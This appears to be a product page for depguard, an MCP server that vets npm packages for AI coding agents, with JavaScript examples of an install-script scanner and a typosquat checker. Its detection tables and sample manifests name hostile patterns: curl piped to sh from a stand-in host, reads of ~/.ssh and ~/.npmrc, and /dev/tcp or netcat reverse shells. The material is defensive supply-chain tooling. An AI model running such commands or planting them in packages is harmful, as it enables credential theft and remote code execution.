An MCP server that guards your codebase from three threats: compromised npm packages, insecure dependencies, and debris left by AI coding agents. Backed by a curated advisory database of known attacks. Every package is verified before install, every coding session is reviewed, every unused dependency is flagged.
```
// Add depguard to any MCP-compatible AI agent
$ claude mcp add depguard -- npx -y depguard-cli --mcp

// 1. AI agent wants to install a package
Agent     "I need RTSP streaming support"
depguard  guard — go2rtc (score 72/100, allow)

// 2. AI agent finishes coding
depguard  review — Found 3 console.logs, 1 empty catch, 1 TODO
Agent     Fixing 5 issues before committing...

// 3. Cleanup unused packages
depguard  sweep — lodash unused (~1.4 MB savings)
```
AI coding agents create two problems: they install packages without checking security, and they leave garbage in your code (console.logs, empty catch blocks, broken imports, orphan files). Without depguard, every npm install is a blind trust decision and every coding session adds invisible debt.
One command connects depguard to your AI agent. From that moment, every install is verified and every coding session is reviewed.
Before every npm install — whether the user asked or the AI decided on its own — depguard verifies the package exists, checks for typosquatting, and runs a security audit.
depguard_guard("express")
After coding, depguard scans the source files for debris the AI left behind: console.logs, empty catch blocks, broken imports, orphan files. The AI agent fixes them before reporting done.
depguard_review(".", "quick")
At the end of a session, depguard finds unused packages that were installed but never imported. The AI agent removes them, keeping the project lean.
depguard_sweep(".")
No API keys. No accounts. No configuration. Your AI agent gets security superpowers in 10 seconds.
$ claude mcp add depguard -- npx -y depguard-cli --mcp
One command. Zero configuration. Your AI agent starts checking every dependency immediately.
```
// Claude Code — one command
$ claude mcp add depguard -- npx -y depguard-cli --mcp

// Claude Desktop, Cursor, Windsurf, Continue.dev, Cline, Roo Code
// Add to your MCP config file:
{
  "mcpServers": {
    "depguard": {
      "command": "npx",
      "args": ["-y", "depguard-cli", "--mcp"]
    }
  }
}

// That's it. Your agent now has 10 security tools.
// No API keys. No accounts. No configuration.
```
Organized by workflow: before installing, after coding, project health, and quick lookups. The AI agent knows when to call each one.
Before Install: Called before every npm install, whether the user asked or the AI decided. Verifies the package exists, detects typosquatting, runs security audit, returns allow/warn/block.
Before Install: When the AI needs functionality ("RTSP streaming", "date formatting"), it calls this before choosing a package. Checks native Node.js alternatives first, then scores npm candidates.
After Coding: Called after code changes or before commit. Finds console.logs, empty catch blocks, broken imports, orphan files, abandoned TODOs. The AI fixes them before reporting done.
After Coding: Finds packages installed but never imported. Config-aware, workspace-aware, peer-dep-aware. Also detects phantom dependencies in node_modules.
Project Health: Deep security audit of a single package. Downloads tarball, scans source code for 18+ malware patterns, checks dual advisory databases, analyzes install scripts.
Project Health: Audit all dependencies from a package.json in one call. Auto-detects project license. Use after cloning a repo or reviewing project security.
Project Health: Crawls the full transitive dependency tree. Aggregates vulnerabilities across all nested packages. Shows circular dependencies and total attack surface.
Quick Lookup: Quick 0-100 quality score. Faster than full audit when you only need the number. Critical vulns cap at 30, high at 50.
Quick Lookup: Quick existence check + typosquatting detection. Faster than guard when you only need to verify a package name exists.
Quick Lookup: Search npm by keywords, sorted by depguard quality score. Find packages without web searches.
Quick Lookup: Audit multiple packages in one call. Use audit_project instead if you have a package.json path.
Every package scored 0–100 across five weighted dimensions. CVSS scores used when available. Hard security ceiling: critical vulns cap total at 30, high vulns at 50. Code analysis findings further reduce the score.
depguard checks 20+ native alternatives before recommending npm packages. Less bloat, smaller attack surface.
Without depguard, you need to check multiple sources, analyze scripts by hand, and make gut-feel decisions. Here's what one command replaces.
| Task | depguard | Manual Approach |
|---|---|---|
| Check known CVEs | ✓ Automated | Search npm + GitHub advisories manually |
| GitHub Advisory Database | ✓ Included | Visit github.com/advisories, search, cross-reference |
| Static code analysis | ✓ 18+ patterns | Download tarball, read source code manually |
| Inspect install scripts | ✓ 20+ patterns | Read package source code line by line |
| Behavioral mismatch | ✓ Automated | Compare description vs code behavior yourself |
| Check maintenance health | ✓ Scored | Check npm page, GitHub commits, last publish date |
| Verify license compatibility | ✓ 25+ SPDX | Read LICENSE file, understand copyleft hierarchy |
| Evaluate package quality | ✓ 0–100 | Subjective judgement, no consistent scoring |
| Find native alternatives | ✓ 20+ mapped | Know Node.js APIs by heart or search docs |
| AI agent integration | ✓ 10 MCP tools | Not possible — agents install blindly |
| Time per package | ~2 seconds | 15–30 minutes of research |
depguard now downloads the package tarball and scans the actual source code for malware patterns, obfuscation, data exfiltration, and behavioral mismatches. Every finding includes a detailed explanation suitable for developers.
Critical: Eval of decoded payloads, reverse shells via net.connect, cryptocurrency mining pool URLs (stratum+tcp). Critical severity — auto-blocks.
Critical: JSON.stringify(process.env), Object.keys(process.env), fetch with dynamic URLs from env vars, bracket-notation env access to evade scanners.
High: eval(), new Function(), child_process.exec/spawn, shell interpreter spawning. Flags dangerous patterns with context.
High: Long hex/unicode-encoded strings, base64 payloads, minified source in non-.min.js files. Techniques used to hide malicious code from reviewers.
Unique: A "string formatter" that makes network calls? A "date utility" that reads the filesystem? depguard compares what a package says it does vs what it actually does.
Developer-Friendly: Every finding includes: severity, category, title, a detailed explanation of why it's dangerous, the exact evidence from source code, and a recommendation.

```
// What your AI agent receives for a suspicious package:
{
  "severity": "critical",
  "category": "data-exfiltration",
  "title": "Serialization of entire environment",
  "explanation": "This package serializes your ENTIRE environment into a JSON string. Your API keys, database passwords, JWT secrets would be exposed.",
  "evidence": "const d = JSON.stringify(process.env);",
  "file": "src/index.js",
  "recommendation": "Do NOT install this package."
}
```
depguard statically analyzes install scripts (preinstall, install, postinstall) for 20+ suspicious patterns. Each finding now includes a rich explanation and recommendation.
| Pattern | Severity | What It Detects |
|---|---|---|
| Remote code execution | Critical | curl/wget piped to sh, download-and-execute chains |
| Credential file access | Critical | Reading ~/.ssh, ~/.aws, ~/.npmrc, ~/.gnupg, /etc/passwd |
| Sensitive env vars | Critical | Accessing $NPM_TOKEN, $AWS_SECRET, $GITHUB_TOKEN |
| Eval of decoded content | Critical | eval(atob(...)), eval(Buffer.from(..., "base64")) |
| Reverse shells | Critical | /dev/tcp connections, netcat with -e flag |
| Shell typosquatting | Critical | /bin/ssh instead of /bin/sh |
| Process spawning | High | child_process, execSync, spawn |
| Dynamic code execution | High | eval(), exec() in install scripts |
| Obfuscated strings | High | Hex-encoded strings, base64 payloads |
| Network APIs | High | net.connect, dgram, dns.resolve in install scripts |
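
How a static check over lifecycle scripts can work, as an added example (not depguard's code or rule set): it reads only the `preinstall`, `install` and `postinstall` entries of a `package.json` and matches them against regexes that approximate six rows of the table above. The function name `scanInstallScripts`, the rule ids, the sample manifests and the mapping of critical to block and high to warn are assumptions.

```javascript
// Added example, not depguard's code. Regexes approximate six rows of the table above.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall"];
const RULES = [
  { id: "remote-code-execution", severity: "critical",   // download piped to a shell
    re: /\b(curl|wget)\b[^|;&]*\|\s*(ba|z)?sh\b/ },
  { id: "credential-file-access", severity: "critical",
    re: /~\/\.(ssh|aws|npmrc|gnupg)\b|\/etc\/passwd\b/ },
  { id: "sensitive-env-var", severity: "critical",
    re: /\$\{?(NPM_TOKEN|AWS_SECRET\w*|GITHUB_TOKEN)\b/ },
  { id: "eval-of-decoded-content", severity: "critical",
    re: /eval\s*\(\s*(atob\s*\(|Buffer\.from\s*\([^)]*base64)/ },
  { id: "reverse-shell", severity: "critical",
    re: /\/dev\/tcp\/|\b(nc|ncat|netcat)\b[^|;&]*\s-e\b/ },
  { id: "process-spawning", severity: "high",
    re: /\bchild_process\b|\bexecSync\b|\bspawn\s*\(/ },
];
const RANK = { critical: 2, high: 1 };

// Scan only the hooks npm runs automatically at install time.
function scanInstallScripts(manifest) {
  const findings = [];
  const scripts = manifest.scripts || {};
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== "string") continue;
    for (const rule of RULES) {
      const m = rule.re.exec(cmd);
      if (m) findings.push({ hook, rule: rule.id, severity: rule.severity, evidence: m[0] });
    }
  }
  findings.sort((a, b) => RANK[b.severity] - RANK[a.severity]);
  // Assumed mapping: any critical finding blocks, high-only findings warn.
  const verdict = findings.some((f) => f.severity === "critical") ? "block"
    : findings.length > 0 ? "warn" : "allow";
  return { verdict, findings };
}

// Constructed package.json fragments (not real packages).
const SAMPLES = {
  benign: { scripts: { install: "node-gyp rebuild", test: "node test.js" } },
  dropper: { scripts: { postinstall: "curl -s https://example.invalid/i.sh | sh" } },
  stealer: { scripts: { preinstall: "node -e \"require('child_process').execSync('cat ~/.npmrc')\"" } },
  builder: { scripts: { postinstall: "node -e \"require('child_process').spawn('node',['build.js'])\"" } },
};

for (const [name, manifest] of Object.entries(SAMPLES)) {
  const { verdict, findings } = scanInstallScripts(manifest);
  console.log(name, verdict, findings.map((f) => `${f.hook}:${f.rule}`).join(", "));
}
```

Regex matching of this kind misses scripts that delegate to a separate file (`node scripts/setup.js`), which is why the page pairs it with source-code analysis of the tarball.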
Major npm supply chain incidents and how depguard detects the patterns that made them possible.
| Package | Year | Severity | What Happened | depguard Detection |
|---|---|---|---|---|
| event-stream | 2018 | Critical | Malicious dependency stole cryptocurrency wallet keys. 8M weekly downloads compromised. | Code analysis flags obfuscated code + credential access patterns. Script analysis catches eval of decoded content. |
| ua-parser-js | 2021 | Critical | Hijacked account published cryptominers and password stealers via postinstall. | Code analysis detects stratum+tcp mining URLs. Install script analysis catches process spawning and credential file access. |
| node-ipc | 2022 | Critical | Maintainer added code to wipe files based on geolocation. Dependency of vue-cli. | Behavioral mismatch: IPC library making network calls + filesystem writes. Advisory database flags GHSA. |
| colors + faker | 2022 | High | Maintainer sabotaged packages with infinite loops. Broke thousands of projects. | Maintenance score drops. Advisory database flags incident. Score falls below threshold. |
| eslint-scope | 2018 | Critical | Compromised token published version stealing npm tokens from ~/.npmrc. | Code analysis detects credential file reads. Script analysis flags env var exfiltration. |
| coa + rc | 2021 | Critical | Hijacked accounts. Obfuscated malware in preinstall scripts. | Code analysis detects base64 + eval pattern. Script analysis flags obfuscated code + process spawning. |
| crossenv (typosquat) | Ongoing | High | Names mimicking popular packages. Steal environment variables on install. | Typosquatting detection via Levenshtein distance. Code analysis flags JSON.stringify(process.env). |
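
The crossenv row depends on name similarity. The following added example (not depguard's code) shows Levenshtein-based typosquat detection, extended with separator normalization so that `crossenv` and `ua_parser_js` are both caught. The popular-name list, the `maxDistance` of 1, the short-name cutoff and the function names are assumptions.

```javascript
// Added example, not depguard's code. Constructed allow-list; a real check
// would derive it from registry download statistics.
const POPULAR = ["cross-env", "express", "lodash", "react", "eslint-scope", "ua-parser-js"];

// Classic edit distance using two rolling rows of the DP table.
function levenshtein(a, b) {
  let prev = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    const cur = [i];
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      cur[j] = Math.min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + cost);
    }
    prev = cur;
  }
  return prev[b.length];
}

// Drop separators so "crossenv" and "cross-env" compare as equal.
const squash = (name) => name.toLowerCase().replace(/[-_.]/g, "");

function checkTyposquat(name, popular = POPULAR, maxDistance = 1) {
  if (popular.includes(name)) return { suspicious: false }; // exact match is the real package
  let best = null;
  for (const target of popular) {
    const sepOnly = squash(name) === squash(target);
    const distance = levenshtein(name.toLowerCase(), target);
    // Very short names collide by chance, so edit-distance hits need length > 4.
    const near = distance <= maxDistance && target.length > 4;
    if ((sepOnly || near) && (!best || distance < best.distance)) {
      best = { target, distance, reason: sepOnly ? "separator-variant" : "edit-distance" };
    }
  }
  return best ? { suspicious: true, ...best } : { suspicious: false };
}

// Constructed candidate names.
for (const name of ["crossenv", "expres", "ua_parser_js", "lodash", "left-pad"]) {
  console.log(name, JSON.stringify(checkTyposquat(name)));
}
```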
depguard now downloads package tarballs and scans source code for malware patterns, obfuscation, and behavioral mismatches. Every finding includes a rich, human-readable explanation.
Downloads the npm package tarball, extracts JS files, and scans with 18+ pattern rules across 6 threat categories: malware, data-exfiltration, code-execution, obfuscation, unexpected-behavior, supply-chain.
Compares the package description and keywords against detected code behavior. A "string formatter" making network calls? Flagged as unexpected-behavior with explanation.
Every finding returns: severity, category, title, detailed explanation, evidence (exact code), file path, and recommendation. AI agents can present these directly to developers.
depguard is the only MCP tool that covers the full AI coding lifecycle: verify packages before install, audit for vulnerabilities, review the code the AI generated, and clean up unused dependencies.
depguard_guard — Before every npm install, whether the user asked or the AI decided. Blocks hallucinated packages, detects typosquatting, runs security audit.
depguard_audit — Deep security analysis. Downloads the tarball, scans source code for malware, checks dual advisory databases, analyzes install scripts.
depguard_review — After coding, scans source files for debris the AI left behind. Console.logs, empty catch blocks, broken imports, orphan files, abandoned TODOs. The AI fixes them before reporting done.
depguard_sweep — Finds packages that were installed but never imported. Config-aware (eslint, typescript, jest...), workspace-aware, with estimated size savings.